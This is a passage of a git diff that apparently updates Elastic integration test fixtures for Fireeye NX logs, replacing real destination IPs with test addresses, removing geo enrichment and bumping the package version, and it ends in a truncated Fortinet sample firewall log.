Francisco, O=Cloudflare, Inc., CN=fireeye.com\",\"issuerdn\":\"C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3\",\"ja3\":{\"hash\":\"21536525fbf9e289f79e0f98af64bb59\",\"string\":\"771,49199-49195-49200-49196-158-159-49191-49187-49192-49188-103-107-49171-49161-49172-49162-51-57-156-157-60-61-47-53-255,0-11-10-13-15-13172,25-24-23,0-1-2\"},\"ja3s\":{\"hash\":\"9873b112313d7c4e5e8ef6207e6c6f0d\",\"string\":\"771,49195,0-65281-11-13172\"},\"fingerprint\":\"2a:6a:46:d2:05:4d:7b:22:1b:68:02:f2:ee:f0:09:c6:ff:15:e9:58\",\"sni\":\"cloud.fireeye.com\",\"version\":\"TLS 1.2\",\"notbefore\":\"2020-07-01T00:00:00.000000+0000\",\"notafter\":\"2021-07-01T12:00:00.000000+0000\",\"client_ciphersuites\":[49199,49195,49200,49196,158,159,49191,49187,49192,49188,103,107,49171,49161,49172,49162,51,57,156,157,60,61,47,53,255],\"client_tls_exts\":[0,11,10,13,15,13172],\"server_ciphersuite\":49195,\"server_tls_exts\":[0,65281,11,13172],\"pubkeylength\":65}}\n","meta_sip4":"192.168.1.99","meta_oml":1146,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} {"rawmsg":"{\"timestamp\":\"2020-09-23T05:02:19.906154+0000\",\"flow_id\":1444203537876422,\"iface\":\"pether3\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.1.222\",\"src_port\":47220,\"dest_ip\":\"192.168.100.31\",\"dest_port\":5601,\"proto\":\"TCP\",\"http\":{\"hostname\":\"192.168.100.31\",\"url\":\"\\/internal\\/search\\/es\",\"http_user_agent\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\",\"http_refer\":\"http:\\/\\/192.168.100.31:5601\\/app\\/kibana\",\"http_method\":\"POST\",\"protocol\":\"HTTP\\/1.1\",\"length\":0},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/internal\\/search\\/es\",\"magic\":\"ASCII text, with very long lines, with no line terminators\",\"state\":\"CLOSED\",\"md5\":\"548d03d3e11c009da833e6e59c4adfee\",\"stored\":false,\"size\":6394,\"tx_id\":0}}\n","meta_sip4":"192.168.1.99","meta_oml":769,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} -{"rawmsg":"{\"timestamp\":\"2020-09-23T05:02:41.077232+0000\",\"flow_id\":206535698492848,\"iface\":\"pether3\",\"event_type\":\"dns\",\"src_ip\":\"192.168.1.176\",\"src_port\":60269,\"dest_ip\":\"8.8.8.8\",\"dest_port\":53,\"proto\":\"UDP\",\"dns\":{\"type\":\"query\",\"id\":28224,\"rrname\":\"time-ios.apple.com\",\"rrtype\":\"A\",\"tx_id\":0}}\n","meta_sip4":"192.168.1.99","meta_oml":289,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} \ No newline at end of file +{"rawmsg":"{\"timestamp\":\"2020-09-23T05:02:41.077232+0000\",\"flow_id\":206535698492848,\"iface\":\"pether3\",\"event_type\":\"dns\",\"src_ip\":\"192.168.1.176\",\"src_port\":60269,\"dest_ip\":\"67.43.156.15\",\"dest_port\":53,\"proto\":\"UDP\",\"dns\":{\"type\":\"query\",\"id\":28224,\"rrname\":\"time-ios.apple.com\",\"rrtype\":\"A\",\"tx_id\":0}}\n","meta_sip4":"192.168.1.99","meta_oml":289,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} \ No newline at end of file diff --git a/packages/fireeye/data_stream/nx/_dev/test/pipeline/test-nx.log-expected.json b/packages/fireeye/data_stream/nx/_dev/test/pipeline/test-nx.log-expected.json index 3071515d2e5..90943f549f8 100644 --- a/packages/fireeye/data_stream/nx/_dev/test/pipeline/test-nx.log-expected.json +++ b/packages/fireeye/data_stream/nx/_dev/test/pipeline/test-nx.log-expected.json @@ -53,7 +53,7 @@ }, "event": { "type": "flow", - "ingested": "2021-10-27T09:47:09.428504550Z", + "ingested": "2021-12-09T13:37:16.999899300Z", "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-22T08:34:44.991339+0000\\\",\\\"flow_id\\\":721570461162990,\\\"event_type\\\":\\\"flow\\\",\\\"src_ip\\\":\\\"fe80:0000:0000:0000:feec:daff:fe31:b706\\\",\\\"src_port\\\":45944,\\\"dest_ip\\\":\\\"ff02:0000:0000:0000:0000:0000:0000:0001\\\",\\\"dest_port\\\":10001,\\\"proto\\\":\\\"UDP\\\",\\\"proto_number\\\":17,\\\"ip_tc\\\":0,\\\"app_proto\\\":\\\"failed\\\",\\\"flow\\\":{\\\"pkts_toserver\\\":8,\\\"pkts_toclient\\\":0,\\\"bytes_toserver\\\":1680,\\\"bytes_toclient\\\":0,\\\"start\\\":\\\"2020-09-22T08:34:12.761326+0000\\\",\\\"end\\\":\\\"2020-09-22T08:34:12.761348+0000\\\",\\\"age\\\":0,\\\"state\\\":\\\"new\\\",\\\"reason\\\":\\\"timeout\\\",\\\"alerted\\\":false}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":520,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" } }, @@ -72,29 +72,11 @@ } }, "destination": { - "geo": { - "continent_name": "Asia", - "region_iso_code": "ID-YO", - "city_name": "Yogyakarta", - "country_iso_code": "ID", - "country_name": "Indonesia", - "region_name": "Yogyakarta", - "location": { - "lon": 110.3646, - "lat": -7.8035 - } - }, - "as": { - "number": 23951, - "organization": { - "name": "PT JEMBATAN CITRA NUSANTARA" - } - }, - "address": "202.65.114.202", + "address": "67.43.156.14", "port": 123, "bytes": 90, - "ip": "202.65.114.202", - "packets": 1 + "packets": 1, + "ip": "67.43.156.14" }, "source": { "address": "192.168.1.15", @@ -108,7 +90,7 @@ ], "network": { "protocol": "failed", - "community_id": "1:dwbu/vcPXLC0ZAVlALqs0a1e77Y=", + "community_id": "1:RXq9OIqNb6ISMqP+R+uVnsOCMAc=", "transport": "udp", "iana_number": 17 }, @@ -123,13 +105,13 @@ "related": { "ip": [ "192.168.1.15", - "202.65.114.202" + "67.43.156.14" ] }, "event": { "type": "flow", - "ingested": "2021-10-27T09:47:09.428536520Z", - "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-22T08:34:44.993228+0000\\\",\\\"flow_id\\\":175370876476591,\\\"event_type\\\":\\\"flow\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"src_port\\\":39808,\\\"dest_ip\\\":\\\"202.65.114.202\\\",\\\"dest_port\\\":123,\\\"proto\\\":\\\"UDP\\\",\\\"proto_number\\\":17,\\\"ip_tos\\\":0,\\\"app_proto\\\":\\\"failed\\\",\\\"flow\\\":{\\\"pkts_toserver\\\":1,\\\"pkts_toclient\\\":1,\\\"bytes_toserver\\\":90,\\\"bytes_toclient\\\":90,\\\"start\\\":\\\"2020-09-22T08:33:15.122031+0000\\\",\\\"end\\\":\\\"2020-09-22T08:33:15.193693+0000\\\",\\\"age\\\":0,\\\"state\\\":\\\"established\\\",\\\"reason\\\":\\\"shutdown\\\",\\\"alerted\\\":false}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":475,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" + "ingested": "2021-12-09T13:37:16.999903100Z", + "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-22T08:34:44.993228+0000\\\",\\\"flow_id\\\":175370876476591,\\\"event_type\\\":\\\"flow\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"src_port\\\":39808,\\\"dest_ip\\\":\\\"67.43.156.14\\\",\\\"dest_port\\\":123,\\\"proto\\\":\\\"UDP\\\",\\\"proto_number\\\":17,\\\"ip_tos\\\":0,\\\"app_proto\\\":\\\"failed\\\",\\\"flow\\\":{\\\"pkts_toserver\\\":1,\\\"pkts_toclient\\\":1,\\\"bytes_toserver\\\":90,\\\"bytes_toclient\\\":90,\\\"start\\\":\\\"2020-09-22T08:33:15.122031+0000\\\",\\\"end\\\":\\\"2020-09-22T08:33:15.193693+0000\\\",\\\"age\\\":0,\\\"state\\\":\\\"established\\\",\\\"reason\\\":\\\"shutdown\\\",\\\"alerted\\\":false}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":475,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" } }, { @@ -185,7 +167,7 @@ }, "event": { "type": "flow", - "ingested": "2021-10-27T09:47:09.428544645Z", + "ingested": "2021-12-09T13:37:16.999909200Z", "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-22T08:34:44.993227+0000\\\",\\\"flow_id\\\":1285126005631046,\\\"event_type\\\":\\\"flow\\\",\\\"src_ip\\\":\\\"fe80:0000:0000:0000:feec:daff:fe31:b706\\\",\\\"src_port\\\":44535,\\\"dest_ip\\\":\\\"ff02:0000:0000:0000:0000:0000:0000:0001\\\",\\\"dest_port\\\":10001,\\\"proto\\\":\\\"UDP\\\",\\\"proto_number\\\":17,\\\"ip_tc\\\":0,\\\"app_proto\\\":\\\"failed\\\",\\\"flow\\\":{\\\"pkts_toserver\\\":8,\\\"pkts_toclient\\\":0,\\\"bytes_toserver\\\":1680,\\\"bytes_toclient\\\":0,\\\"start\\\":\\\"2020-09-22T08:34:22.763974+0000\\\",\\\"end\\\":\\\"2020-09-22T08:34:22.764073+0000\\\",\\\"age\\\":0,\\\"state\\\":\\\"new\\\",\\\"reason\\\":\\\"shutdown\\\",\\\"alerted\\\":false}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":522,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" } }, @@ -213,29 +195,11 @@ } }, "destination": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-HE", - "city_name": "Frankfurt am Main", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Hesse", - "location": { - "lon": 8.6843, - "lat": 50.1188 - } - }, - "as": { - "number": 42473, - "organization": { - "name": "ANEXIA Internetdienstleistungs GmbH" - } - }, - "address": "213.227.168.146", + "address": "67.43.156.15", "port": 5938, "bytes": 59808, - "ip": "213.227.168.146", - "packets": 544 + "packets": 544, + "ip": "67.43.156.15" }, "source": { "address": "192.168.1.150", @@ -249,7 +213,7 @@ ], "network": { "protocol": "failed", - "community_id": "1:+/xj+eTk/ch6VeYkwqFLSEFasbQ=", + "community_id": "1:45/AGSM9JqMdS9WIK3bAZqim3A4=", "transport": "tcp", "iana_number": 6 }, @@ -264,13 +228,13 @@ "related": { "ip": [ "192.168.1.150", - "213.227.168.146" + "67.43.156.15" ] }, "event": { "type": "flow", - "ingested": "2021-10-27T09:47:09.428551238Z", - "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-22T08:34:44.993286+0000\\\",\\\"flow_id\\\":222460015300681,\\\"event_type\\\":\\\"flow\\\",\\\"src_ip\\\":\\\"192.168.1.150\\\",\\\"src_port\\\":51082,\\\"dest_ip\\\":\\\"213.227.168.146\\\",\\\"dest_port\\\":5938,\\\"proto\\\":\\\"TCP\\\",\\\"proto_number\\\":6,\\\"ip_tos\\\":0,\\\"app_proto\\\":\\\"failed\\\",\\\"flow\\\":{\\\"pkts_toserver\\\":799,\\\"pkts_toclient\\\":544,\\\"bytes_toserver\\\":69825,\\\"bytes_toclient\\\":59808,\\\"start\\\":\\\"2020-09-22T04:48:48.282697+0000\\\",\\\"end\\\":\\\"2020-09-22T08:34:36.067255+0000\\\",\\\"age\\\":13548,\\\"state\\\":\\\"established\\\",\\\"reason\\\":\\\"shutdown\\\",\\\"alerted\\\":false},\\\"tcp\\\":{\\\"tcp_flags\\\":\\\"1a\\\",\\\"tcp_flags_ts\\\":\\\"1a\\\",\\\"tcp_flags_tc\\\":\\\"1a\\\",\\\"syn\\\":true,\\\"psh\\\":true,\\\"ack\\\":true,\\\"state\\\":\\\"established\\\"}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":611,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" + "ingested": "2021-12-09T13:37:16.999915900Z", + "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-22T08:34:44.993286+0000\\\",\\\"flow_id\\\":222460015300681,\\\"event_type\\\":\\\"flow\\\",\\\"src_ip\\\":\\\"192.168.1.150\\\",\\\"src_port\\\":51082,\\\"dest_ip\\\":\\\"67.43.156.15\\\",\\\"dest_port\\\":5938,\\\"proto\\\":\\\"TCP\\\",\\\"proto_number\\\":6,\\\"ip_tos\\\":0,\\\"app_proto\\\":\\\"failed\\\",\\\"flow\\\":{\\\"pkts_toserver\\\":799,\\\"pkts_toclient\\\":544,\\\"bytes_toserver\\\":69825,\\\"bytes_toclient\\\":59808,\\\"start\\\":\\\"2020-09-22T04:48:48.282697+0000\\\",\\\"end\\\":\\\"2020-09-22T08:34:36.067255+0000\\\",\\\"age\\\":13548,\\\"state\\\":\\\"established\\\",\\\"reason\\\":\\\"shutdown\\\",\\\"alerted\\\":false},\\\"tcp\\\":{\\\"tcp_flags\\\":\\\"1a\\\",\\\"tcp_flags_ts\\\":\\\"1a\\\",\\\"tcp_flags_tc\\\":\\\"1a\\\",\\\"syn\\\":true,\\\"psh\\\":true,\\\"ack\\\":true,\\\"state\\\":\\\"established\\\"}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":611,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" } }, { @@ -288,29 +252,11 @@ } }, "destination": { - "geo": { - "continent_name": "Asia", - "region_iso_code": "TH-40", - "city_name": "Ban Kho", - "country_iso_code": "TH", - "country_name": "Thailand", - "region_name": "Khon Kaen", - "location": { - "lon": 102.6842, - "lat": 16.4007 - } - }, - "as": { - "number": 9546, - "organization": { - "name": "Ministry of University Affairs" - } - }, - "address": "202.28.116.236", + "address": "67.43.156.14", "port": 123, "bytes": 90, - "ip": "202.28.116.236", - "packets": 1 + "packets": 1, + "ip": "67.43.156.14" }, "source": { "address": "192.168.1.15", @@ -324,7 +270,7 @@ ], "network": { "protocol": "failed", - "community_id": "1:Ahqgaqtz5y0V0twJYxhsEC4oe5Q=", + "community_id": "1:lPFhChZNfHDZ1i2YD0w8DBTTAf0=", "transport": "udp", "iana_number": 17 }, @@ -339,13 +285,13 @@ "related": { "ip": [ "192.168.1.15", - "202.28.116.236" + "67.43.156.14" ] }, "event": { "type": "flow", - "ingested": "2021-10-27T09:47:09.428557209Z", - "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-22T08:34:44.993501+0000\\\",\\\"flow_id\\\":1463569002949603,\\\"event_type\\\":\\\"flow\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"src_port\\\":52147,\\\"dest_ip\\\":\\\"202.28.116.236\\\",\\\"dest_port\\\":123,\\\"proto\\\":\\\"UDP\\\",\\\"proto_number\\\":17,\\\"ip_tos\\\":0,\\\"app_proto\\\":\\\"failed\\\",\\\"flow\\\":{\\\"pkts_toserver\\\":1,\\\"pkts_toclient\\\":1,\\\"bytes_toserver\\\":90,\\\"bytes_toclient\\\":90,\\\"start\\\":\\\"2020-09-22T08:32:06.355299+0000\\\",\\\"end\\\":\\\"2020-09-22T08:32:06.439495+0000\\\",\\\"age\\\":0,\\\"state\\\":\\\"established\\\",\\\"reason\\\":\\\"shutdown\\\",\\\"alerted\\\":false}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":476,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" + "ingested": "2021-12-09T13:37:16.999921200Z", + "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-22T08:34:44.993501+0000\\\",\\\"flow_id\\\":1463569002949603,\\\"event_type\\\":\\\"flow\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"src_port\\\":52147,\\\"dest_ip\\\":\\\"67.43.156.14\\\",\\\"dest_port\\\":123,\\\"proto\\\":\\\"UDP\\\",\\\"proto_number\\\":17,\\\"ip_tos\\\":0,\\\"app_proto\\\":\\\"failed\\\",\\\"flow\\\":{\\\"pkts_toserver\\\":1,\\\"pkts_toclient\\\":1,\\\"bytes_toserver\\\":90,\\\"bytes_toclient\\\":90,\\\"start\\\":\\\"2020-09-22T08:32:06.355299+0000\\\",\\\"end\\\":\\\"2020-09-22T08:32:06.439495+0000\\\",\\\"age\\\":0,\\\"state\\\":\\\"established\\\",\\\"reason\\\":\\\"shutdown\\\",\\\"alerted\\\":false}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":476,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" } }, { @@ -355,15 +301,9 @@ } }, "destination": { - "as": { - "number": 13335, - "organization": { - "name": "Cloudflare, Inc." - } - }, - "address": "162.159.246.125", "port": 443, - "ip": "162.159.246.125" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "source": { "port": 53918, @@ -377,7 +317,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:hohAqFfok7/ZazgOLxyINJAOFsc=", + "community_id": "1:YekG1DgBPSO2IV15xvK9ncRxx8c=", "iana_number": 6, "transport": "tcp" }, @@ -392,7 +332,7 @@ "related": { "ip": [ "192.168.1.99", - "162.159.246.125" + "67.43.156.13" ] }, "tls": { @@ -457,8 +397,8 @@ }, "event": { "type": "tls", - "ingested": "2021-10-27T09:47:09.428563050Z", - "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-23T05:02:01.175635+0000\\\",\\\"flow_id\\\":1136872856843530,\\\"iface\\\":\\\"pether3\\\",\\\"event_type\\\":\\\"tls\\\",\\\"src_ip\\\":\\\"192.168.1.99\\\",\\\"src_port\\\":53918,\\\"dest_ip\\\":\\\"162.159.246.125\\\",\\\"dest_port\\\":443,\\\"proto\\\":\\\"TCP\\\",\\\"tls\\\":{\\\"subject\\\":\\\"C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=fireeye.com\\\",\\\"issuerdn\\\":\\\"C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3\\\",\\\"ja3\\\":{\\\"hash\\\":\\\"21536525fbf9e289f79e0f98af64bb59\\\",\\\"string\\\":\\\"771,49199-49195-49200-49196-158-159-49191-49187-49192-49188-103-107-49171-49161-49172-49162-51-57-156-157-60-61-47-53-255,0-11-10-13-15-13172,25-24-23,0-1-2\\\"},\\\"ja3s\\\":{\\\"hash\\\":\\\"9873b112313d7c4e5e8ef6207e6c6f0d\\\",\\\"string\\\":\\\"771,49195,0-65281-11-13172\\\"},\\\"fingerprint\\\":\\\"2a:6a:46:d2:05:4d:7b:22:1b:68:02:f2:ee:f0:09:c6:ff:15:e9:58\\\",\\\"sni\\\":\\\"cloud.fireeye.com\\\",\\\"version\\\":\\\"TLS 1.2\\\",\\\"notbefore\\\":\\\"2020-07-01T00:00:00.000000+0000\\\",\\\"notafter\\\":\\\"2021-07-01T12:00:00.000000+0000\\\",\\\"client_ciphersuites\\\":[49199,49195,49200,49196,158,159,49191,49187,49192,49188,103,107,49171,49161,49172,49162,51,57,156,157,60,61,47,53,255],\\\"client_tls_exts\\\":[0,11,10,13,15,13172],\\\"server_ciphersuite\\\":49195,\\\"server_tls_exts\\\":[0,65281,11,13172],\\\"pubkeylength\\\":65}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":1146,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" + "ingested": "2021-12-09T13:37:16.999927600Z", + "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-23T05:02:01.175635+0000\\\",\\\"flow_id\\\":1136872856843530,\\\"iface\\\":\\\"pether3\\\",\\\"event_type\\\":\\\"tls\\\",\\\"src_ip\\\":\\\"192.168.1.99\\\",\\\"src_port\\\":53918,\\\"dest_ip\\\":\\\"67.43.156.13\\\",\\\"dest_port\\\":443,\\\"proto\\\":\\\"TCP\\\",\\\"tls\\\":{\\\"subject\\\":\\\"C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=fireeye.com\\\",\\\"issuerdn\\\":\\\"C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3\\\",\\\"ja3\\\":{\\\"hash\\\":\\\"21536525fbf9e289f79e0f98af64bb59\\\",\\\"string\\\":\\\"771,49199-49195-49200-49196-158-159-49191-49187-49192-49188-103-107-49171-49161-49172-49162-51-57-156-157-60-61-47-53-255,0-11-10-13-15-13172,25-24-23,0-1-2\\\"},\\\"ja3s\\\":{\\\"hash\\\":\\\"9873b112313d7c4e5e8ef6207e6c6f0d\\\",\\\"string\\\":\\\"771,49195,0-65281-11-13172\\\"},\\\"fingerprint\\\":\\\"2a:6a:46:d2:05:4d:7b:22:1b:68:02:f2:ee:f0:09:c6:ff:15:e9:58\\\",\\\"sni\\\":\\\"cloud.fireeye.com\\\",\\\"version\\\":\\\"TLS 1.2\\\",\\\"notbefore\\\":\\\"2020-07-01T00:00:00.000000+0000\\\",\\\"notafter\\\":\\\"2021-07-01T12:00:00.000000+0000\\\",\\\"client_ciphersuites\\\":[49199,49195,49200,49196,158,159,49191,49187,49192,49188,103,107,49171,49161,49172,49162,51,57,156,157,60,61,47,53,255],\\\"client_tls_exts\\\":[0,11,10,13,15,13172],\\\"server_ciphersuite\\\":49195,\\\"server_tls_exts\\\":[0,65281,11,13172],\\\"pubkeylength\\\":65}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":1146,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" } }, { @@ -527,7 +467,7 @@ }, "event": { "type": "fileinfo", - "ingested": "2021-10-27T09:47:09.428569031Z", + "ingested": "2021-12-09T13:37:16.999933900Z", "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-23T05:02:19.906154+0000\\\",\\\"flow_id\\\":1444203537876422,\\\"iface\\\":\\\"pether3\\\",\\\"event_type\\\":\\\"fileinfo\\\",\\\"src_ip\\\":\\\"192.168.1.222\\\",\\\"src_port\\\":47220,\\\"dest_ip\\\":\\\"192.168.100.31\\\",\\\"dest_port\\\":5601,\\\"proto\\\":\\\"TCP\\\",\\\"http\\\":{\\\"hostname\\\":\\\"192.168.100.31\\\",\\\"url\\\":\\\"\\\\/internal\\\\/search\\\\/es\\\",\\\"http_user_agent\\\":\\\"Mozilla\\\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\\\/537.36 (KHTML, like Gecko) Chrome\\\\/85.0.4183.102 Safari\\\\/537.36\\\",\\\"http_refer\\\":\\\"http:\\\\/\\\\/192.168.100.31:5601\\\\/app\\\\/kibana\\\",\\\"http_method\\\":\\\"POST\\\",\\\"protocol\\\":\\\"HTTP\\\\/1.1\\\",\\\"length\\\":0},\\\"app_proto\\\":\\\"http\\\",\\\"fileinfo\\\":{\\\"filename\\\":\\\"\\\\/internal\\\\/search\\\\/es\\\",\\\"magic\\\":\\\"ASCII text, with very long lines, with no line terminators\\\",\\\"state\\\":\\\"CLOSED\\\",\\\"md5\\\":\\\"548d03d3e11c009da833e6e59c4adfee\\\",\\\"stored\\\":false,\\\"size\\\":6394,\\\"tx_id\\\":0}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":769,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" }, "user_agent": { @@ -551,24 +491,9 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "address": "8.8.8.8", "port": 53, - "ip": "8.8.8.8" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "dns": { "question": { @@ -590,7 +515,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:UvtLXqkWlKOvWqllTYIlbXPvU9Y=", + "community_id": "1:DrM2UXVr/51WHNjvsvUqPj+MU88=", "iana_number": 17, "transport": "udp" }, @@ -605,13 +530,13 @@ "related": { "ip": [ "192.168.1.176", - "8.8.8.8" + "67.43.156.15" ] }, "event": { "type": "dns", - "ingested": "2021-10-27T09:47:09.428574421Z", - "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-23T05:02:41.077232+0000\\\",\\\"flow_id\\\":206535698492848,\\\"iface\\\":\\\"pether3\\\",\\\"event_type\\\":\\\"dns\\\",\\\"src_ip\\\":\\\"192.168.1.176\\\",\\\"src_port\\\":60269,\\\"dest_ip\\\":\\\"8.8.8.8\\\",\\\"dest_port\\\":53,\\\"proto\\\":\\\"UDP\\\",\\\"dns\\\":{\\\"type\\\":\\\"query\\\",\\\"id\\\":28224,\\\"rrname\\\":\\\"time-ios.apple.com\\\",\\\"rrtype\\\":\\\"A\\\",\\\"tx_id\\\":0}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":289,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" + "ingested": "2021-12-09T13:37:16.999940200Z", + "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-23T05:02:41.077232+0000\\\",\\\"flow_id\\\":206535698492848,\\\"iface\\\":\\\"pether3\\\",\\\"event_type\\\":\\\"dns\\\",\\\"src_ip\\\":\\\"192.168.1.176\\\",\\\"src_port\\\":60269,\\\"dest_ip\\\":\\\"67.43.156.15\\\",\\\"dest_port\\\":53,\\\"proto\\\":\\\"UDP\\\",\\\"dns\\\":{\\\"type\\\":\\\"query\\\",\\\"id\\\":28224,\\\"rrname\\\":\\\"time-ios.apple.com\\\",\\\"rrtype\\\":\\\"A\\\",\\\"tx_id\\\":0}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":289,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" } } ] diff --git a/packages/fireeye/manifest.yml b/packages/fireeye/manifest.yml index 50ecbaa1b21..25a739ab137 100644 --- a/packages/fireeye/manifest.yml +++ b/packages/fireeye/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: fireeye title: "Fireeye" -version: 1.1.0 +version: 1.1.1 license: basic description: "This Elastic integration collects Fireeye NX logs." type: integration diff --git a/packages/fortinet/_dev/deploy/docker/sample_logs/fortinet-firewall.log b/packages/fortinet/_dev/deploy/docker/sample_logs/fortinet-firewall.log index e3c4ddd0d9f..69666746641 100644 --- a/packages/fortinet/_dev/deploy/docker/sample_logs/fortinet-firewall.log +++ b/packages/fortinet/_dev/deploy/docker/sample_logs/fortinet-firewall.log @@ -1,32 +1,32 @@ -<188>date=2020-04-23 time=12:17:48 devname="testswitch1" devid="somerouterid" logid="0316013056" type="utm" subtype="webfilter" eventtype="ftgd_blk" level="warning" vd="root" eventtime=1587230269052907555 tz="-0500" policyid=100602 sessionid=1234 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 srcport=61930 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=443 dstintf="wan1" dstintfrole="wan" proto=6 service="HTTPS" hostname="elastic.co" profile="elasticruleset" action="blocked" reqtype="direct" url="/config/" sentbyte=1152 rcvdbyte=1130 direction="outgoing" msg="URL belongs to a denied category in policy" method="domain" cat=76 catdesc="Internet Telephony" -<189>date=2020-04-23 time=01:16:08 devname="testswitch1" devid="somerouterid" logid="0000000013" type="traffic" subtype="forward" level="notice" vd="OPERATIONAL" eventtime=1592961368 srcip=10.10.10.10 srcport=60899 srcintf="srcintfname" srcintfrole="lan" dstip=8.8.8.8 dstport=161 dstintf="dstintfname" dstintfrole="lan" sessionid=155313 proto=17 action="deny" policyid=0 policytype="policy" service="SNMP" dstcountry="Reserved" srccountry="Reserved" trandisp="noop" duration=0 sentbyte=0 rcvdbyte=0 sentpkt=0 appcat="unscanned" crscore=30 craction=131072 crlevel="high" -<189>date=2020-04-23 time=12:17:45 devname="testswitch1" devid="somerouterid" logid="0317013312" type="utm" subtype="webfilter" eventtype="ftgd_allow" level="notice" vd="root" eventtime=1587230266314799756 tz="-0500" policyid=38 sessionid=543234 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 srcport=65236 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=443 dstintf="wan1" dstintfrole="wan" proto=6 service="HTTPS" hostname="elastic.co" profile="elasticruleset" action="passthrough" reqtype="direct" url="/" sentbyte=3545 rcvdbyte=6812 direction="outgoing" msg="URL belongs to an allowed category in policy" method="domain" cat=23 catdesc="Web-based Email" -<190>date=2020-04-23 time=13:17:35 devname="testswitch1" devid="somerouterid" logid="1059028704" type="utm" subtype="app-ctrl" eventtype="signature" level="information" vd="root" eventtime=1587230255061492894 tz="-0400" appid=40568 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 dstip=8.8.8.8 srcport=59790 dstport=443 srcintf="LAN" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 service="SSL" direction="outgoing" policyid=12 sessionid=453234 applist="elasticruleset" action="pass" appcat="Web.Client" app="HTTPS.BROWSER" hostname="elastic.co" incidentserialno=23465 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" scertcname="test.elastic.co" -<190>date=2020-04-23 time=13:17:35 devname="testswitch1" devid="somerouterid" logid="1059028704" type="utm" subtype="app-ctrl" eventtype="signature" level="information" vd="root" eventtime=1591788391 tz="-0400" appid=40568 user="elasticuser" group="elasticgroup" 